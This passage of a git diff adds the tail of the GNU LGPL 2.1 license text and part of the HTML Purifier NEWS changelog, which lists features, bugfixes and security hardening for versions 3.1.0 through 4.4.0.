it). Whether that is true depends on what the Library does +and what the program that uses the Library does. + + 1. You may copy and distribute verbatim copies of the Library's +complete source code as you receive it, in any medium, provided that +you conspicuously and appropriately publish on each copy an +appropriate copyright notice and disclaimer of warranty; keep intact +all the notices that refer to this License and to the absence of any +warranty; and distribute a copy of this License along with the +Library. + + You may charge a fee for the physical act of transferring a copy, +and you may at your option offer warranty protection in exchange for a +fee. + + 2. You may modify your copy or copies of the Library or any portion +of it, thus forming a work based on the Library, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) The modified work must itself be a software library. + + b) You must cause the files modified to carry prominent notices + stating that you changed the files and the date of any change. + + c) You must cause the whole of the work to be licensed at no + charge to all third parties under the terms of this License. + + d) If a facility in the modified Library refers to a function or a + table of data to be supplied by an application program that uses + the facility, other than as an argument passed when the facility + is invoked, then you must make a good faith effort to ensure that, + in the event an application does not supply such function or + table, the facility still operates, and performs whatever part of + its purpose remains meaningful. + + (For example, a function in a library to compute square roots has + a purpose that is entirely well-defined independent of the + application. Therefore, Subsection 2d requires that any + application-supplied function or table used by this function must + be optional: if the application does not supply it, the square + root function must still compute square roots.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Library, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Library, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote +it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Library. + +In addition, mere aggregation of another work not based on the Library +with the Library (or with a work based on the Library) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may opt to apply the terms of the ordinary GNU General Public +License instead of this License to a given copy of the Library. To do +this, you must alter all the notices that refer to this License, so +that they refer to the ordinary GNU General Public License, version 2, +instead of to this License. (If a newer version than version 2 of the +ordinary GNU General Public License has appeared, then you can specify +that version instead if you wish.) Do not make any other change in +these notices. + + Once this change is made in a given copy, it is irreversible for +that copy, so the ordinary GNU General Public License applies to all +subsequent copies and derivative works made from that copy. + + This option is useful when you wish to copy part of the code of +the Library into a program that is not a library. + + 4. You may copy and distribute the Library (or a portion or +derivative of it, under Section 2) in object code or executable form +under the terms of Sections 1 and 2 above provided that you accompany +it with the complete corresponding machine-readable source code, which +must be distributed under the terms of Sections 1 and 2 above on a +medium customarily used for software interchange. + + If distribution of object code is made by offering access to copy +from a designated place, then offering equivalent access to copy the +source code from the same place satisfies the requirement to +distribute the source code, even though third parties are not +compelled to copy the source along with the object code. + + 5. A program that contains no derivative of any portion of the +Library, but is designed to work with the Library by being compiled or +linked with it, is called a "work that uses the Library". Such a +work, in isolation, is not a derivative work of the Library, and +therefore falls outside the scope of this License. + + However, linking a "work that uses the Library" with the Library +creates an executable that is a derivative of the Library (because it +contains portions of the Library), rather than a "work that uses the +library". The executable is therefore covered by this License. +Section 6 states terms for distribution of such executables. + + When a "work that uses the Library" uses material from a header file +that is part of the Library, the object code for the work may be a +derivative work of the Library even though the source code is not. +Whether this is true is especially significant if the work can be +linked without the Library, or if the work is itself a library. The +threshold for this to be true is not precisely defined by law. + + If such an object file uses only numerical parameters, data +structure layouts and accessors, and small macros and small inline +functions (ten lines or less in length), then the use of the object +file is unrestricted, regardless of whether it is legally a derivative +work. (Executables containing this object code plus portions of the +Library will still fall under Section 6.) + + Otherwise, if the work is a derivative of the Library, you may +distribute the object code for the work under the terms of Section 6. +Any executables containing that work also fall under Section 6, +whether or not they are linked directly with the Library itself. + + 6. As an exception to the Sections above, you may also combine or +link a "work that uses the Library" with the Library to produce a +work containing portions of the Library, and distribute that work +under terms of your choice, provided that the terms permit +modification of the work for the customer's own use and reverse +engineering for debugging such modifications. + + You must give prominent notice with each copy of the work that the +Library is used in it and that the Library and its use are covered by +this License. You must supply a copy of this License. If the work +during execution displays copyright notices, you must include the +copyright notice for the Library among them, as well as a reference +directing the user to the copy of this License. Also, you must do one +of these things: + + a) Accompany the work with the complete corresponding + machine-readable source code for the Library including whatever + changes were used in the work (which must be distributed under + Sections 1 and 2 above); and, if the work is an executable linked + with the Library, with the complete machine-readable "work that + uses the Library", as object code and/or source code, so that the + user can modify the Library and then relink to produce a modified + executable containing the modified Library. (It is understood + that the user who changes the contents of definitions files in the + Library will not necessarily be able to recompile the application + to use the modified definitions.) + + b) Use a suitable shared library mechanism for linking with the + Library. A suitable mechanism is one that (1) uses at run time a + copy of the library already present on the user's computer system, + rather than copying library functions into the executable, and (2) + will operate properly with a modified version of the library, if + the user installs one, as long as the modified version is + interface-compatible with the version that the work was made with. + + c) Accompany the work with a written offer, valid for at + least three years, to give the same user the materials + specified in Subsection 6a, above, for a charge no more + than the cost of performing this distribution. + + d) If distribution of the work is made by offering access to copy + from a designated place, offer equivalent access to copy the above + specified materials from the same place. + + e) Verify that the user has already received a copy of these + materials or that you have already sent this user a copy. + + For an executable, the required form of the "work that uses the +Library" must include any data and utility programs needed for +reproducing the executable from it. However, as a special exception, +the materials to be distributed need not include anything that is +normally distributed (in either source or binary form) with the major +components (compiler, kernel, and so on) of the operating system on +which the executable runs, unless that component itself accompanies +the executable. + + It may happen that this requirement contradicts the license +restrictions of other proprietary libraries that do not normally +accompany the operating system. Such a contradiction means you cannot +use both them and the Library together in an executable that you +distribute. + + 7. You may place library facilities that are a work based on the +Library side-by-side in a single library together with other library +facilities not covered by this License, and distribute such a combined +library, provided that the separate distribution of the work based on +the Library and of the other library facilities is otherwise +permitted, and provided that you do these two things: + + a) Accompany the combined library with a copy of the same work + based on the Library, uncombined with any other library + facilities. This must be distributed under the terms of the + Sections above. + + b) Give prominent notice with the combined library of the fact + that part of it is a work based on the Library, and explaining + where to find the accompanying uncombined form of the same work. + + 8. You may not copy, modify, sublicense, link with, or distribute +the Library except as expressly provided under this License. Any +attempt otherwise to copy, modify, sublicense, link with, or +distribute the Library is void, and will automatically terminate your +rights under this License. However, parties who have received copies, +or rights, from you under this License will not have their licenses +terminated so long as such parties remain in full compliance. + + 9. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Library or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Library (or any work based on the +Library), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Library or works based on it. + + 10. Each time you redistribute the Library (or any work based on the +Library), the recipient automatically receives a license from the +original licensor to copy, distribute, link with or modify the Library +subject to these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties with +this License. + + 11. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Library at all. For example, if a patent +license would not permit royalty-free redistribution of the Library by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Library. + +If any portion of this section is held invalid or unenforceable under any +particular circumstance, the balance of the section is intended to apply, +and the section as a whole is intended to apply in other circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 12. If the distribution and/or use of the Library is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Library under this License may add +an explicit geographical distribution limitation excluding those countries, +so that distribution is permitted only in or among countries not thus +excluded. In such case, this License incorporates the limitation as if +written in the body of this License. + + 13. The Free Software Foundation may publish revised and/or new +versions of the Lesser General Public License from time to time. +Such new versions will be similar in spirit to the present version, +but may differ in detail to address new problems or concerns. + +Each version is given a distinguishing version number. If the Library +specifies a version number of this License which applies to it and +"any later version", you have the option of following the terms and +conditions either of that version or of any later version published by +the Free Software Foundation. If the Library does not specify a +license version number, you may choose any version ever published by +the Free Software Foundation. + + 14. If you wish to incorporate parts of the Library into other free +programs whose distribution conditions are incompatible with these, +write to the author to ask for permission. For software which is +copyrighted by the Free Software Foundation, write to the Free +Software Foundation; we sometimes make exceptions for this. Our +decision will be guided by the two goals of preserving the free status +of all derivatives of our free software and of promoting the sharing +and reuse of software generally. + + NO WARRANTY + + 15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO +WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. +EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR +OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY +KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE +LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME +THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN +WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY +AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU +FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR +CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE +LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING +RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A +FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF +SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH +DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Libraries + + If you develop a new library, and you want it to be of the greatest +possible use to the public, we recommend making it free software that +everyone can redistribute and change. You can do so by permitting +redistribution under these terms (or, alternatively, under the terms of the +ordinary General Public License). + + To apply these terms, attach the following notices to the library. It is +safest to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least the +"copyright" line and a pointer to where the full notice is found. + + <one line to give the library's name and a brief idea of what it does.> + Copyright (C) <year> <name of author> + + This library is free software; you can redistribute it and/or + modify it under the terms of the GNU Lesser General Public + License as published by the Free Software Foundation; either + version 2.1 of the License, or (at your option) any later version. + + This library is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + Lesser General Public License for more details. + + You should have received a copy of the GNU Lesser General Public + License along with this library; if not, write to the Free Software + Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + +Also add information on how to contact you by electronic and paper mail. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the library, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the + library `Frob' (a library for tweaking knobs) written by James Random Hacker. + + <signature of Ty Coon>, 1 April 1990 + Ty Coon, President of Vice + +That's all there is to it! + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/NEWS b/lib/htmlpurifier/NEWS new file mode 100644 index 000000000..e8a07a979 --- /dev/null +++ b/lib/htmlpurifier/NEWS @@ -0,0 +1,1032 @@ +NEWS ( CHANGELOG and HISTORY ) HTMLPurifier +||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| + += KEY ==================== + # Breaks back-compat + ! Feature + - Bugfix + + Sub-comment + . Internal change +========================== + +4.4.0, released 2012-01-18 +# Removed PEARSax3 handler. +# URI.Munge now munges URIs inside the same host that go from https + to http. Reported by Neike Taika-Tessaro. +# Core.EscapeNonASCIICharacters now always transforms entities to + entities, even if target encoding is UTF-8. +# Tighten up selector validation in ExtractStyleBlocks. + Non-syntactically valid selectors are now rejected, along with + some of the more obscure ones such as attribute selectors, the + :lang pseudoselector, and anything not in CSS2.1. Furthermore, + ID and class selectors now work properly with the relevant + configuration attributes. Also, mute errors when parsing CSS + with CSS Tidy. +! Added support for 'scope' attribute on tables. +! Added %HTML.TargetBlank, which adds target="blank" to all outgoing links. +! Properly handle sub-lists directly nested inside of lists in + a standards compliant way, by moving them into the preceding <li> +! Added %HTML.AllowedComments and %HTML.AllowedCommentsRegexp for + limited allowed comments in untrusted situations. +! Implement iframes, and allow them to be used in untrusted mode with + %HTML.SafeIframe and %URI.SafeIframeRegexp. Thanks Bradley M. Froehle + <brad.froehle@gmail.com> for submitting an initial version of the patch. +! The Forms module now works properly for transitional doctypes. +! Added support for internationalized domain names. You need the PEAR + Net_IDNA2 module to be in your path; if it is installed, ensure the + class can be loaded and then set %Core.EnableIDNA to true. +- Color keywords are now case insensitive. Thanks Yzmir Ramirez + <yramirez-htmlpurifier@adicio.com> for reporting. +- Explicitly initialize anonModule variable to null. +- Do not duplicate nofollow if already present. Thanks 178 + for reporting. +- Do not add nofollow if hostname matches our current host. Thanks 178 + for reporting, and Neike Taika-Tessaro for helping diagnose. +- Do not unset parser variable; this fixes intermittent serialization + problems. Thanks Neike Taika-Tessaro for reporting, bill + <10010tiger@gmail.com> for diagnosing. +- Fix iconv truncation bug, where non-UTF-8 target encodings see + output truncated after around 8000 characters. Thanks Jörg Ludwig + <joerg.ludwig@iserv.eu> for reporting. +- Fix broken table content model for XHTML1.1 (and also earlier + versions, although the W3C validator doesn't catch those violations). + Thanks GlitchMr <glitch.mr@gmail.com> for reporting. + +4.3.0, released 2011-03-27 +# Fixed broken caching of customized raw definitions, but requires an + API change. The old API still works but will emit a warning, + see http://htmlpurifier.org/docs/enduser-customize.html#optimized + for how to upgrade your code. +# Protect against Internet Explorer innerHTML behavior by specially + treating attributes with backticks but no angled brackets, quotes or + spaces. This constitutes a slight semantic change, which can be + reverted using %Output.FixInnerHTML. Reported by Neike Taika-Tessaro + and Mario Heiderich. +# Protect against cssText/innerHTML by restricting allowed characters + used in fonts further than mandated by the specification and encoding + some extra special characters in URLs. Reported by Neike + Taika-Tessaro and Mario Heiderich. +! Added %HTML.Nofollow to add rel="nofollow" to external links. +! More types of SPL autoloaders allowed on later versions of PHP. +! Implementations for position, top, left, right, bottom, z-index + when %CSS.Trusted is on. +! Add %Cache.SerializerPermissions option for custom serializer + directory/file permissions +! Fix longstanding bug in Flash support for non-IE browsers, and + allow more wmode attributes. +! Add %CSS.AllowedFonts to restrict permissible font names. +- Switch to an iterative traversal of the DOM, which prevents us + from running out of stack space for deeply nested documents. + Thanks Maxim Krizhanovsky for contributing a patch. +- Make removal of conditional IE comments ungreedy; thanks Bernd + for reporting. +- Escape CDATA before removing Internet Explorer comments. +- Fix removal of id attributes under certain conditions by ensuring + armor attributes are preserved when recreating tags. +- Check if schema.ser was corrupted. +- Check if zend.ze1_compatibility_mode is on, and error out if it is. + This safety check is only done for HTMLPurifier.auto.php; if you + are using standalone or the specialized includes files, you're + expected to know what you're doing. +- Stop repeatedly writing the cache file after I'm done customizing a + raw definition. Reported by ajh. +- Switch to using require_once in the Bootstrap to work around bad + interaction with Zend Debugger and APC. Reported by Antonio Parraga. +- Fix URI handling when hostname is missing but scheme is present. + Reported by Neike Taika-Tessaro. +- Fix missing numeric entities on DirectLex; thanks Neike Taika-Tessaro + for reporting. +- Fix harmless notice from indexing into empty string. Thanks Matthijs + Kooijman <matthijs@stdin.nl> for reporting. +- Don't autoclose no parent elements are able to support the element + that triggered the autoclose. In particular fixes strange behavior + of stray <li> tags. Thanks pkuliga@gmail.com for reporting and + Neike Taika-Tessaro <pinkgothic@gmail.com> for debugging assistance. + +4.2.0, released 2010-09-15 +! Added %Core.RemoveProcessingInstructions, which lets you remove + <? ... ?> statements. +! Added %URI.DisableResources functionality; the directive originally + did nothing. Thanks David Rothstein for reporting. +! Add documentation about configuration directive types. +! Add %CSS.ForbiddenProperties configuration directive. +! Add %HTML.FlashAllowFullScreen to permit embedded Flash objects + to utilize full-screen mode. +! Add optional support for the <code>file</code> URI scheme, enable + by explicitly setting %URI.AllowedSchemes. +! Add %Core.NormalizeNewlines options to allow turning off newline + normalization. +- Fix improper handling of Internet Explorer conditional comments + by parser. Thanks zmonteca for reporting. +- Fix missing attributes bug when running on Mac Snow Leopard and APC. + Thanks sidepodcast for the fix. +- Warn if an element is allowed, but an attribute it requires is + not allowed. + +4.1.1, released 2010-05-31 +- Fix undefined index warnings in maintenance scripts. +- Fix bug in DirectLex for parsing elements with a single attribute + with entities. +- Rewrite CSS output logic for font-family and url(). Thanks Mario + Heiderich <mario.heiderich@googlemail.com> for reporting and Takeshi + Terada <t-terada@violet.plala.or.jp> for suggesting the fix. +- Emit an error for CollectErrors if a body is extracted +- Fix bug where in background-position for center keyword handling. +- Fix infinite loop when a wrapper element is inserted in a context + where it's not allowed. Thanks Lars <lars@renoz.dk> for reporting. +- Remove +x bit and shebang from index.php; only supported mode is to + explicitly call it with php. +- Make test script less chatty when log_errors is on. + +4.1.0, released 2010-04-26 +! Support proprietary height attribute on table element +! Support YouTube slideshows that contain /cp/ in their URL. +! Support for data: URI scheme; not enabled by default, add it using + %URI.AllowedSchemes +! Support flashvars when using %HTML.SafeObject and %HTML.SafeEmbed. +! Support for Internet Explorer compatibility with %HTML.SafeObject + using %Output.FlashCompat. +! Handle <ol><ol> properly, by inserting the necessary <li> tag. +- Always quote the insides of url(...) in CSS. + +4.0.0, released 2009-07-07 +# APIs for ConfigSchema subsystem have substantially changed. See + docs/dev-config-bcbreaks.txt for details; in essence, anything that + had both namespace and directive now have a single unified key. +# Some configuration directives were renamed, specifically: + %AutoFormatParam.PurifierLinkifyDocURL -> %AutoFormat.PurifierLinkify.DocURL + %FilterParam.ExtractStyleBlocksEscaping -> %Filter.ExtractStyleBlocks.Escaping + %FilterParam.ExtractStyleBlocksScope -> %Filter.ExtractStyleBlocks.Scope + %FilterParam.ExtractStyleBlocksTidyImpl -> %Filter.ExtractStyleBlocks.TidyImpl + As usual, the old directive names will still work, but will throw E_NOTICE + errors. +# The allowed values for class have been relaxed to allow all of CDATA for + doctypes that are not XHTML 1.1 or XHTML 2.0. For old behavior, set + %Attr.ClassUseCDATA to false. +# Instead of appending the content model to an old content model, a blank + element will replace the old content model. You can use #SUPER to get + the old content model. +! More robust support for name="" and id="" +! HTMLPurifier_Config::inherit($config) allows you to inherit one + configuration, and have changes to that configuration be propagated + to all of its children. +! Implement %HTML.Attr.Name.UseCDATA, which relaxes validation rules on + the name attribute when set. Use with care. Thanks Ian Cook for + sponsoring. +! Implement %AutoFormat.RemoveEmpty.RemoveNbsp, which removes empty + tags that contain non-breaking spaces as well other whitespace. You + can also modify which tags should have maintained with + %AutoFormat.RemoveEmpty.RemoveNbsp.Exceptions. +! Implement %Attr.AllowedClasses, which allows administrators to restrict + classes users can use to a specified finite set of classes, and + %Attr.ForbiddenClasses, which is the logical inverse. +! You can now maintain your own configuration schema directories by + creating a config-schema.php file or passing an extra argument. Check + docs/dev-config-schema.html for more details. +! Added HTMLPurifier_Config->serialize() method, which lets you save away + your configuration in a compact serial file, which you can unserialize + and use directly without having to go through the overhead of setup. +- Fix bug where URIDefinition would not get cleared if it's directives got + changed. +- Fix fatal error in HTMLPurifier_Encoder on certain platforms (probably NetBSD 5.0) +- Fix bug in Linkify autoformatter involving <a><span>http://foo</span></a> +- Make %URI.Munge not apply to links that have the same host as your host. +- Prevent stray </body> tag from truncating output, if a second </body> + is present. +. Created script maintenance/rename-config.php for renaming a configuration + directive while maintaining its alias. This script does not change source code. +. Implement namespace locking for definition construction, to prevent + bugs where a directive is used for definition construction but is not + used to construct the cache hash. + +3.3.0, released 2009-02-16 +! Implement CSS property 'overflow' when %CSS.AllowTricky is true. +! Implement generic property list classess +- Fix bug with testEncodingSupportsASCII() algorithm when iconv() implementation + does not do the "right thing" with characters not supported in the output + set. +- Spellcheck UTF-8: The Secret To Character Encoding +- Fix improper removal of the contents of elements with only whitespace. Thanks + Eric Wald for reporting. +- Fix broken test suite in versions of PHP without spl_autoload_register() +- Fix degenerate case with YouTube filter involving double hyphens. + Thanks Pierre Attar for reporting. +- Fix YouTube rendering problem on certain versions of Firefox. +- Fix CSSDefinition Printer problems with decorators +- Add text parameter to unit tests, forces text output +. Add verbose mode to command line test runner, use (--verbose) +. Turn on unit tests for UnitConverter +. Fix missing version number in configuration %Attr.DefaultImageAlt (added 3.2.0) +. Fix newline errors that caused spurious failures when CRLF HTML Purifier was + tested on Linux. +. Removed trailing whitespace from all text files, see + remote-trailing-whitespace.php maintenance script. +. Convert configuration to use property list backend. + +3.2.0, released 2008-10-31 +# Using %Core.CollectErrors forces line number/column tracking on, whereas + previously you could theoretically turn it off. +# HTMLPurifier_Injector->notifyEnd() is formally deprecated. Please + use handleEnd() instead. +! %Output.AttrSort for when you need your attributes in alphabetical order to + deal with a bug in FCKEditor. Requested by frank farmer. +! Enable HTML comments when %HTML.Trusted is on. Requested by Waldo Jaquith. +! Proper support for name attribute. It is now allowed and equivalent to the id + attribute in a and img tags, and is only converted to id when %HTML.TidyLevel + is heavy (for all doctypes). +! %AutoFormat.RemoveEmpty to remove some empty tags from documents. Please don't + use on hand-written HTML. +! Add error-cases for unsupported elements in MakeWellFormed. This enables + the strategy to be used, standalone, on untrusted input. +! %Core.AggressivelyFixLt is on by default. This causes more sensible + processing of left angled brackets in smileys and other whatnot. +! Test scripts now have a 'type' parameter, which lets you say 'htmlpurifier', + 'phpt', 'vtest', etc. in order to only execute those tests. This supercedes + the --only-phpt parameter, although for backwards-compatibility the flag + will still work. +! AutoParagraph auto-formatter will now preserve double-newlines upon output. + Users who are not performing inbound filtering, this may seem a little + useless, but as a bonus, the test suite and handling of edge cases is also + improved. +! Experimental implementation of forms for %HTML.Trusted +! Track column numbers when maintain line numbers is on +! Proprietary 'background' attribute on table-related elements converted into + corresponding CSS. Thanks Fusemail for sponsoring this feature! +! Add forward(), forwardUntilEndToken(), backward() and current() to Injector + supertype. +! HTMLPurifier_Injector->handleEnd() permits modification to end tokens. The + time of operation varies slightly from notifyEnd() as *all* end tokens are + processed by the injector before they are subject to the well-formedness rules. +! %Attr.DefaultImageAlt allows overriding default behavior of setting alt to + basename of image when not present. +! %AutoFormat.DisplayLinkURI neuters <a> tags into plain text URLs. +- Fix two bugs in %URI.MakeAbsolute; one involving empty paths in base URLs, + the other involving an undefined $is_folder error. +- Throw error when %Core.Encoding is set to a spurious value. Previously, + this errored silently and returned false. +- Redirected stderr to stdout for flush error output. +- %URI.DisableExternal will now use the host in %URI.Base if %URI.Host is not + available. +- Do not re-munge URL if the output URL has the same host as the input URL. + Requested by Chris. +- Fix error in documentation regarding %Filter.ExtractStyleBlocks +- Prevent <![CDATA[<body></body>]]> from triggering %Core.ConvertDocumentToFragment +- Fix bug with inline elements in blockquotes conflicting with strict doctype +- Detect if HTML support is disabled for DOM by checking for loadHTML() method. +- Fix bug where dots and double-dots in absolute URLs without hostname were + not collapsed by URIFilter_MakeAbsolute. +- Fix bug with anonymous modules operating on SafeEmbed or SafeObject elements + by reordering their addition. +- Will now throw exception on many error conditions during lexer creation; also + throw an exception when MaintainLineNumbers is true, but a non-tracksLineNumbers + is being used. +- Detect if domxml extension is loaded, and use DirectLEx accordingly. +- Improve handling of big numbers with floating point arithmetic in UnitConverter. + Reported by David Morton. +. Strategy_MakeWellFormed now operates in-place, saving memory and allowing + for more interesting filter-backtracking +. New HTMLPurifier_Injector->rewind() functionality, allows injectors to rewind + index to reprocess tokens. +. StringHashParser now allows for multiline sections with "empty" content; + previously the section would remain undefined. +. Added --quick option to multitest.php, which tests only the most recent + release for each series. +. Added --distro option to multitest.php, which accepts either 'normal' or + 'standalone'. This supercedes --exclude-normal and --exclude-standalone + +3.1.1, released 2008-06-19 +# %URI.Munge now, by default, does not munge resources (for example, <img src="">) + In order to enable this again, please set %URI.MungeResources to true. +! More robust imagecrash protection with height/width CSS with %CSS.MaxImgLength, + and height/width HTML with %HTML.MaxImgLength. +! %URI.MungeSecretKey for secure URI munging. Thanks Chris + for sponsoring this feature. Check out the corresponding documentation + for details. (Att Nightly testers: The API for this feature changed before + the general release. Namely, rename your directives %URI.SecureMungeSecretKey => + %URI.MungeSecretKey and and %URI.SecureMunge => %URI.Munge) +! Implemented post URI filtering. Set member variable $post to true to set + a URIFilter as such. +! Allow modules to define injectors via $info_injector. Injectors are + automatically disabled if injector's needed elements are not found. +! Support for "safe" objects added, use %HTML.SafeObject and %HTML.SafeEmbed. + Thanks Chris for sponsoring. If you've been using ad hoc code from the + forums, PLEASE use this instead. +! Added substitutions for %e, %n, %a and %p in %URI.Munge (in order, + embedded, tag name, attribute name, CSS property name). See %URI.Munge + for more details. Requested by Jochem Blok. +- Disable percent height/width attributes for img. +- AttrValidator operations are now atomic; updates to attributes are not + manifest in token until end of operations. This prevents naughty internal + code from directly modifying CurrentToken when they're not supposed to. + This semantics change was requested by frank farmer. +- Percent encoding checks enabled for URI query and fragment +- Fix stray backslashes in font-family; CSS Unicode character escapes are + now properly resolved (although *only* in font-family). Thanks Takeshi Terada + for reporting. +- Improve parseCDATA algorithm to take into account newline normalization +- Account for browser confusion between Yen character and backslash in + Shift_JIS encoding. This fix generalizes to any other encoding which is not + a strict superset of printable ASCII. Thanks Takeshi Terada for reporting. +- Fix missing configuration parameter in Generator calls. Thanks vs for the + partial patch. +- Improved adherence to Unicode by checking for non-character codepoints. + Thanks Geoffrey Sneddon for reporting. This may result in degraded + performance for extremely large inputs. +- Allow CSS property-value pair ''text-decoration: none''. Thanks Jochem Blok + for reporting. +. Added HTMLPurifier_UnitConverter and HTMLPurifier_Length for convenient + handling of CSS-style lengths. HTMLPurifier_AttrDef_CSS_Length now uses + this class. +. API of HTMLPurifier_AttrDef_CSS_Length changed from __construct($disable_negative) + to __construct($min, $max). __construct(true) is equivalent to + __construct('0'). +. Added HTMLPurifier_AttrDef_Switch class +. Rename HTMLPurifier_HTMLModule_Tidy->construct() to setup() and bubble method + up inheritance hierarchy to HTMLPurifier_HTMLModule. All HTMLModules + get this called with the configuration object. All modules now + use this rather than __construct(), although legacy code using constructors + will still work--the new format, however, lets modules access the + configuration object for HTML namespace dependant tweaks. +. AttrDef_HTML_Pixels now takes a single construction parameter, pixels. +. ConfigSchema data-structure heavily optimized; on average it uses a third + the memory it did previously. The interface has changed accordingly, + consult changes to HTMLPurifier_Config for details. +. Variable parsing types now are magic integers instead of strings +. Added benchmark for ConfigSchema +. HTMLPurifier_Generator requires $config and $context parameters. If you + don't know what they should be, use HTMLPurifier_Config::createDefault() + and new HTMLPurifier_Context(). +. Printers now properly distinguish between output configuration, and + target configuration. This is not applicable to scripts using + the Printers for HTML Purifier related tasks. +. HTML/CSS Printers must be primed with prepareGenerator($gen_config), otherwise + fatal errors will ensue. +. URIFilter->prepare can return false in order to abort loading of the filter +. Factory for AttrDef_URI implemented, URI#embedded to indicate URI that embeds + an external resource. +. %URI.Munge functionality factored out into a post-filter class. +. Added CurrentCSSProperty context variable during CSS validation + +3.1.0, released 2008-05-18 +# Unnecessary references to objects (vestiges of PHP4) removed from method + signatures. The following methods do not need references when assigning from + them and will result in E_STRICT errors if you try: + + HTMLPurifier_Config->get*Definition() [* = HTML, CSS] + + HTMLPurifier_ConfigSchema::instance() + + HTMLPurifier_DefinitionCacheFactory::instance() + + HTMLPurifier_DefinitionCacheFactory->create() + + HTMLPurifier_DoctypeRegistry->register() + + HTMLPurifier_DoctypeRegistry->get() + + HTMLPurifier_HTMLModule->addElement() + + HTMLPurifier_HTMLModule->addBlankElement() + + HTMLPurifier_LanguageFactory::instance() +# Printer_ConfigForm's get*() functions were static-ified +# %HTML.ForbiddenAttributes requires attribute declarations to be in the + form of tag@attr, NOT tag.attr (which will throw an error and won't do + anything). This is for forwards compatibility with XML; you'd do best + to migrate an %HTML.AllowedAttributes directives to this syntax too. +! Allow index to be false for config from form creation +! Added HTMLPurifier::VERSION constant +! Commas, not dashes, used for serializer IDs. This change is forwards-compatible + and allows for version numbers like "3.1.0-dev". +! %HTML.Allowed deals gracefully with whitespace anywhere, anytime! +! HTML Purifier's URI handling is a lot more robust, with much stricter + validation checks and better percent encoding handling. Thanks Gareth Heyes + for indicating security vulnerabilities from lax percent encoding. +! Bootstrap autoloader deals more robustly with classes that don't exist, + preventing class_exists($class, true) from barfing. +- InterchangeBuilder now alphabetizes its lists +- Validation error in configdoc output fixed +- Iconv and other encoding errors muted even with custom error handlers that + do not honor error_reporting +- Add protection against imagecrash attack with CSS height/width +- HTMLPurifier::instance() created for consistency, is equivalent to getInstance() +- Fixed and revamped broken ConfigForm smoketest +- Bug with bool/null fields in Printer_ConfigForm fixed +- Bug with global forbidden attributes fixed +- Improved error messages for allowed and forbidden HTML elements and attributes +- Missing (or null) in configdoc documentation restored +- If DOM throws and exception during parsing with PH5P (occurs in newer versions + of DOM), HTML Purifier punts to DirectLex +- Fatal error with unserialization of ScriptRequired +- Created directories are now chmod'ed properly +- Fixed bug with fallback languages in LanguageFactory +- Standalone testing setup properly with autoload +. Out-of-date documentation revised +. UTF-8 encoding check optimization as suggested by Diego +. HTMLPurifier_Error removed in favor of exceptions +. More copy() function removed; should use 